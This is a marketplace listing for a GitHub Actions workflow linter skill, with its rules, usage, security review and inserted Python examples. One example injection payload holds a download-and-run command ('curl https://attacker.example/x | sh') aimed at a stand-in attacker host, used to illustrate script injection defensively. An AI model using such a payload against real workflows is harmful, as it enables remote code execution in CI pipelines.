charlie-morrison

Github Actions Linter

Author: charlie-morrison · GitHub · v1.0.0 · MIT-0
cross-platform · security check passed
86 total downloads · 0 favorites · 0 current installs · 1 version
Install in OpenClaw:
/install github-actions-linter
Description
Lint and validate GitHub Actions workflow YAML files for common mistakes, security issues, deprecated actions, and best practices. Use when asked to lint, va...
Usage (SKILL.md)

GitHub Actions Linter

Lint GitHub Actions workflow files for syntax errors, security issues, deprecated actions, and best practices violations.

Commands

All commands use the bundled Python script at scripts/gha_linter.py.

1. Lint a workflow file

python3 scripts/gha_linter.py lint <file-or-directory> [--strict] [--format text|json|markdown]

Runs all lint rules against one or more workflow files. If given a directory, scans for *.yml and *.yaml files recursively.

Flags:

  • --strict — exit code 1 on any warning (not just errors)
  • --format — output format: text (default), json, markdown

2. Audit for security issues

python3 scripts/gha_linter.py security <file> [--format text|json|markdown]

Focused security audit: shell injection via ${{ }} in run:, hardcoded secrets, overly permissive permissions, untrusted event contexts in expressions.

3. Check for deprecated actions

python3 scripts/gha_linter.py deprecated <file> [--format text|json|markdown]

Detect outdated action versions (e.g., actions/checkout@v2, actions/setup-node@v3 when v4 exists) and suggest upgrades.

4. Validate workflow structure

python3 scripts/gha_linter.py validate <file> [--format text|json|markdown]

Structural validation only: required keys (on, jobs), valid trigger events, valid runs-on labels, job dependency graph (circular deps, missing refs).

Lint Rules (28 total)

Syntax & Structure (8 rules)

  1. missing-on — Workflow missing on trigger
  2. missing-jobs — Workflow missing jobs section
  3. empty-jobs — Jobs section is empty
  4. missing-runs-on — Job missing runs-on
  5. missing-steps — Job missing steps
  6. empty-steps — Steps list is empty
  7. invalid-trigger — Unknown trigger event name
  8. circular-deps — Circular job dependency via needs
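One way the validate command's job-graph checks (missing needs references and the circular-deps rule above) can be implemented, as an added example that is not the project's own code. It works on the jobs mapping a YAML loader would return, which is constructed inline here; the rule id missing-needs-ref for dangling references is an assumption, since the page names only circular-deps. Cycles are found with a three-colour depth-first search so that each cycle is reported once, with its path.

```python
"""Job dependency graph validation for GitHub Actions workflows (added example)."""
from typing import Any


def _needs_of(job: dict[str, Any]) -> list[str]:
    """`needs` may be written as a single job id or as a list of ids."""
    needs = job.get("needs", [])
    if isinstance(needs, str):
        return [needs]
    return list(needs)


def check_needs_graph(jobs: dict[str, dict[str, Any]]) -> list[dict[str, str]]:
    """Return hits for `missing-needs-ref` (assumed id) and `circular-deps`."""
    issues: list[dict[str, str]] = []

    # Pass 1: every `needs` entry must name a job that exists in the workflow.
    for job_id, job in jobs.items():
        for dep in _needs_of(job):
            if dep not in jobs:
                issues.append({"rule": "missing-needs-ref", "job": job_id,
                               "message": f"Job '{job_id}' needs undefined job '{dep}'"})

    # Pass 2: three-colour DFS. GREY = on the current path, so reaching a GREY
    # node again means the path from it back to here is a cycle.
    WHITE, GREY, BLACK = 0, 1, 2
    colour = {job_id: WHITE for job_id in jobs}
    reported: set = set()  # frozensets of job ids, to report each cycle once

    def visit(job_id: str, path: list[str]) -> None:
        colour[job_id] = GREY
        path.append(job_id)
        for dep in _needs_of(jobs[job_id]):
            if dep not in jobs:
                continue  # already reported in pass 1
            if colour[dep] == GREY:
                cycle = path[path.index(dep):] + [dep]
                key = frozenset(cycle)
                if key not in reported:
                    reported.add(key)
                    issues.append({"rule": "circular-deps", "job": job_id,
                                   "message": "Circular job dependency: " + " -> ".join(cycle)})
            elif colour[dep] == WHITE:
                visit(dep, path)
        path.pop()
        colour[job_id] = BLACK

    for job_id in jobs:
        if colour[job_id] == WHITE:
            visit(job_id, [])
    return issues


# Constructed sample: deploy <-> approve form a cycle, notify needs a job that
# does not exist, build/test are fine.
SAMPLE_JOBS = {
    "build": {"runs-on": "ubuntu-latest", "steps": []},
    "test": {"needs": "build", "runs-on": "ubuntu-latest"},
    "deploy": {"needs": ["test", "approve"], "runs-on": "ubuntu-latest"},
    "approve": {"needs": "deploy", "runs-on": "ubuntu-latest"},
    "notify": {"needs": ["publish"], "runs-on": "ubuntu-latest"},
}

if __name__ == "__main__":
    for issue in check_needs_graph(SAMPLE_JOBS):
        print(f"error [{issue['rule']}] {issue['message']}")
```

Running the sample reports the dangling `publish` reference first and then the `deploy -> approve -> deploy` cycle; a self-referencing job (`needs: itself`) is caught by the same GREY check.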

Security (8 rules)

  1. shell-injection — ${{ }} expression in run: (potential injection)
  2. hardcoded-secret — Hardcoded password/token/key patterns in workflow
  3. permissive-permissions — permissions: write-all or no permissions block
  4. untrusted-context — Dangerous contexts in expressions (github.event.issue.title, github.event.pull_request.body, etc.)
  5. pull-request-target — pull_request_target with checkout of PR head (known attack vector)
  6. third-party-action — Non-verified third party action without pinned SHA
  7. env-in-run — Secret used directly in run: instead of via env:
  8. excessive-permissions — Job requests more permissions than needed
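A compact implementation of four of the security rules above (permissive-permissions, shell-injection, untrusted-context, third-party-action and pull-request-target), as an added example rather than the project's own code. Like the security command it audits a whole workflow, but here the workflow is the mapping a YAML loader returns (the bundled script uses its own minimal YAML parser) and is constructed inline. The list of attacker-controlled contexts and the set of owners treated as first-party for SHA pinning are assumptions; the page names only some of those contexts.

```python
"""Security rules over a parsed GitHub Actions workflow (added example)."""
import re
from typing import Any, Iterator

EXPR_RE = re.compile(r"\$\{\{\s*(.+?)\s*\}\}")
COMMIT_SHA_RE = re.compile(r"^[0-9a-f]{40}$")

# Event fields a PR author or issue author controls (assumed list).
UNTRUSTED_PREFIXES = (
    "github.event.issue.title", "github.event.issue.body",
    "github.event.pull_request.title", "github.event.pull_request.body",
    "github.event.pull_request.head.ref", "github.event.comment.body",
    "github.head_ref",
)
# Owners exempt from the SHA-pin rule (assumption: GitHub's own actions).
VERIFIED_OWNERS = {"actions", "github"}


def _triggers(workflow: dict[str, Any]) -> set[str]:
    # PyYAML (YAML 1.1) loads a bare `on:` key as the boolean True, so accept both.
    on = workflow.get("on", workflow.get(True))
    if isinstance(on, str):
        return {on}
    if isinstance(on, list):
        return set(on)
    return set(on or {})


def _steps(workflow: dict[str, Any]) -> Iterator[tuple[str, int, dict[str, Any]]]:
    for job_id, job in (workflow.get("jobs") or {}).items():
        for idx, step in enumerate(job.get("steps") or []):
            yield job_id, idx, step


def audit(workflow: dict[str, Any]) -> list[dict[str, str]]:
    """Return rule hits in the order they are found."""
    issues: list[dict[str, str]] = []

    def hit(rule: str, where: str, message: str) -> None:
        issues.append({"rule": rule, "where": where, "message": message})

    permissions = workflow.get("permissions")
    if permissions is None:
        hit("permissive-permissions", "workflow",
            "no permissions block; GITHUB_TOKEN gets the repository default scope")
    elif permissions == "write-all":
        hit("permissive-permissions", "workflow", "permissions: write-all")

    on_pr_target = "pull_request_target" in _triggers(workflow)

    for job_id, idx, step in _steps(workflow):
        where = f"jobs.{job_id}.steps[{idx}]"
        script = step.get("run")
        if isinstance(script, str):
            # Any expression in run: is substituted into the script text before
            # the shell parses it; attacker-controlled ones are script injection.
            for expr in EXPR_RE.findall(script):
                hit("shell-injection", where,
                    f"${{{{ {expr} }}}} is expanded into run: before the shell parses it; pass it via env:")
        with_block = step.get("with") or {}
        for key, value in with_block.items():
            for expr in EXPR_RE.findall(str(value)):
                if expr.startswith(UNTRUSTED_PREFIXES):
                    hit("untrusted-context", f"{where}.with.{key}",
                        f"attacker-controlled {expr} passed to an action input")
        uses = step.get("uses")
        if not isinstance(uses, str) or uses.startswith(("./", "docker://")) or "@" not in uses:
            continue
        action, _, ref = uses.partition("@")
        if action.split("/")[0] not in VERIFIED_OWNERS and not COMMIT_SHA_RE.match(ref):
            hit("third-party-action", where, f"{uses} is not pinned to a full commit SHA")
        if on_pr_target and action == "actions/checkout":
            ref_expr = str(with_block.get("ref", ""))
            if "pull_request.head" in ref_expr or "github.head_ref" in ref_expr:
                hit("pull-request-target", where,
                    "pull_request_target checks out the PR head; untrusted code runs with secrets")
    return issues


# Constructed sample: a pull_request_target triage workflow with the classic mistakes.
SAMPLE_WORKFLOW = {
    "name": "triage",
    "on": ["pull_request_target"],
    "jobs": {"triage": {"runs-on": "ubuntu-latest", "steps": [
        {"uses": "actions/checkout@v4",
         "with": {"ref": "${{ github.event.pull_request.head.sha }}"}},
        {"name": "Echo title", "run": 'echo "${{ github.event.pull_request.title }}"'},
        {"uses": "someorg/label-action@v2",
         "with": {"body": "${{ github.event.pull_request.body }}"}},
        {"name": "Safe echo", "env": {"TITLE": "${{ github.event.pull_request.title }}"},
         "run": 'echo "$TITLE"'},
    ]}},
}

if __name__ == "__main__":
    for issue in audit(SAMPLE_WORKFLOW):
        print(f"{issue['where']} [{issue['rule']}] {issue['message']}")
```

The last step of the sample shows the remediation the env-in-run rule points at: the same expression moved into env: produces no finding, because the shell then sees `$TITLE` as data rather than as part of its command text.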

Deprecated & Outdated (4 rules)

  1. deprecated-action — Action version is outdated (v1/v2 when v4 exists)
  2. deprecated-runner — Using deprecated runner labels (ubuntu-18.04, macos-10.15)
  3. set-output-deprecated — Using deprecated ::set-output:: command
  4. save-state-deprecated — Using deprecated ::save-state:: command

Best Practices (8 rules)

  1. missing-timeout — Job without timeout-minutes (default 6h is dangerous)
  2. missing-name — Step without name (harder to debug)
  3. latest-tag — Action pinned to @main or @master (unstable)
  4. no-concurrency — Workflow without concurrency (can waste resources)
  5. hardcoded-runner — Hardcoded runner version instead of -latest
  6. long-run-command — run: block exceeds 50 lines (should be a script)
  7. duplicate-step-id — Duplicate id in steps within same job
  8. missing-if-continue — continue-on-error: true without explanation comment

Output Formats

Text (default)

workflow.yml:12:3 error [shell-injection] Expression ${{ github.event.issue.title }} in run: is vulnerable to injection
workflow.yml:25:5 warning [missing-timeout] Job 'build' has no timeout-minutes (default: 360 min)
workflow.yml:31:7 warning [missing-name] Step at index 2 has no name

3 issues (1 error, 2 warnings)
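Why the first finding above is an error rather than a style warning, shown as an added example that is not part of the skill. The Actions runner substitutes `${{ }}` expressions into the step's script text before the shell ever parses it, so a crafted issue title becomes shell syntax; with the env: form the title reaches the shell only as the value of a variable. The payload, the two steps and the `github.event` lookup are constructed here; only the event context is modelled.

```python
"""Expression expansion in run: versus env:, imitating the runner (added example)."""
import re
import shlex

EXPR_RE = re.compile(r"\$\{\{\s*([\w.\-]+)\s*\}\}")

# Constructed event payload: an issue whose title carries shell syntax.
EVENT = {"issue": {"title": 'Bug report"; curl https://attacker.example/x | sh; echo "'}}

VULNERABLE_STEP = {
    "name": "Announce issue",
    "run": 'echo "New issue: ${{ github.event.issue.title }}"',
}

HARDENED_STEP = {
    "name": "Announce issue",
    "env": {"TITLE": "${{ github.event.issue.title }}"},
    "run": 'echo "New issue: $TITLE"',
}


def lookup(path: str, event: dict) -> str:
    """Resolve github.event.<a>.<b>... against the payload (assumed: only this context exists)."""
    parts = path.split(".")
    if parts[:2] != ["github", "event"]:
        raise KeyError(path)
    node = event
    for key in parts[2:]:
        node = node[key]
    return str(node)


def expand_expressions(text: str, event: dict) -> str:
    """Plain textual substitution, which is what happens before the shell starts."""
    return EXPR_RE.sub(lambda m: lookup(m.group(1), event), text)


def render_step(step: dict, event: dict) -> tuple[str, dict[str, str]]:
    """Return (script, env) exactly as the shell would receive them."""
    script = expand_expressions(step["run"], event)
    env = {k: expand_expressions(v, event) for k, v in step.get("env", {}).items()}
    return script, env


def command_separators(script: str) -> int:
    """Count shell control operators the shell will split the script on."""
    lexer = shlex.shlex(script, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    return sum(1 for tok in lexer if tok in {";", "|", "||", "&", "&&"})


if __name__ == "__main__":
    for label, step in (("vulnerable", VULNERABLE_STEP), ("hardened", HARDENED_STEP)):
        script, env = render_step(step, EVENT)
        print(f"{label}: {command_separators(script)} separator(s)\n  script: {script}\n  env: {env}")
```

For the vulnerable step the rendered script is `echo "New issue: Bug report"; curl https://attacker.example/x | sh; echo ""`, three separate commands; for the hardened step the script text is unchanged and the whole title sits in `TITLE`, where the shell never interprets it.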

JSON

{
  "file": "workflow.yml",
  "issues": [...],
  "summary": {"errors": 1, "warnings": 2, "info": 0}
}

Markdown

Summary table with severity, rule, location, and message.

CI Integration

# .github/workflows/lint-actions.yml (written to pass its own --strict run)
name: Lint Workflows
on: [push, pull_request]
permissions:
  contents: read
concurrency:
  group: lint-${{ github.ref }}
  cancel-in-progress: true
jobs:
  lint:
    runs-on: ubuntu-latest
    timeout-minutes: 5
    steps:
      - name: Check out repository
        uses: actions/checkout@v4
      - name: Lint workflow files
        run: python3 scripts/gha_linter.py lint .github/workflows/ --strict

Exit codes: 0 = clean, 1 = errors found (or warnings in --strict mode).

Safe-use recommendations
This skill appears to be a straightforward, bundled Python linter for GitHub Actions workflows. Before installing or running it: (1) inspect the full script (scripts/gha_linter.py) yourself — running arbitrary code has risk even if it looks benign; (2) run it on a local or sandboxed copy of your repository if you have sensitive workflows or secrets (the tool will read any files you point it at); (3) expect some false positives/negatives because it uses a custom minimal YAML parser; (4) no credentials are required, so avoid granting tokens or secrets to the skill. If you want extra assurance, run the script in an isolated environment (container) and review its full source for any network or shell operations before use.
Functional analysis
Type: OpenClaw Skill
Name: github-actions-linter
Version: 1.0.0
The skill bundle provides a legitimate utility for linting and auditing GitHub Actions workflow files. The core logic in `scripts/gha_linter.py` implements standard security checks (such as shell injection detection, hardcoded secret scanning, and SHA pinning) and best-practice validations using only the Python standard library. There is no evidence of data exfiltration, unauthorized network access, or malicious prompt injection within the instructions or code.
Capability assessment
Purpose & Capability
Name/description (GitHub Actions linter) match the delivered artifacts: runtime instructions call the bundled Python script and the repository contains a linter implementation. There are no unrelated required binaries or credentials.
Instruction Scope
SKILL.md instructs the agent to run the included script (python3 scripts/gha_linter.py) against one or more files or directories and provides modes (lint, security, deprecated, validate). This necessarily reads workflow files (e.g., .github/workflows/*.yml) and can be pointed at arbitrary paths — expected for a linter, but users should be aware it will parse any files/dirs you ask it to analyze.
Install Mechanism
No install spec or external downloads. The linter is bundled as a local Python script and claims to rely only on stdlib; nothing is pulled from external URLs or package registries.
Credentials
The skill declares no required environment variables or credentials. SKILL.md and the visible code do not reference secret or external credentials. Requesting no tokens is proportional to a static linter.
Persistence & Privilege
The skill's `always` flag is false, and it does not request elevated or persistent presence. There are no instructions to modify other skills or global agent configuration.
How to use
  1. Make sure OpenClaw is installed (local or Docker deployment)
  2. Enter the install command in the chat box: /install github-actions-linter
  3. After installation, call the skill by name or trigger it with /github-actions-linter
  4. Provide the required input as described in the skill's parameter documentation to get structured output
Version history
v1.0.0
Initial release
Metadata
Slug github-actions-linter
Version 1.0.0
License MIT-0
Total installs 0
Current installs 0
Versions 1
FAQ

What is Github Actions Linter?

Lint and validate GitHub Actions workflow YAML files for common mistakes, security issues, deprecated actions, and best practices. Use when asked to lint, va... It is an AI agent skill plugin for Claude Code / OpenClaw, with 86 downloads to date.

How do I install Github Actions Linter?

Run the command "/install github-actions-linter" in the OpenClaw or Claude Code chat box to install it in one step; no extra configuration is needed.

Is Github Actions Linter free?

Yes. Github Actions Linter is free under the MIT-0 license and can be downloaded, installed and used without restriction.

Which platforms does Github Actions Linter support?

Github Actions Linter is cross-platform and runs in any environment where OpenClaw / Claude Code is deployed.

Who developed Github Actions Linter?

Developed and maintained by charlie-morrison (@charlie-morrison); current version v1.0.0.
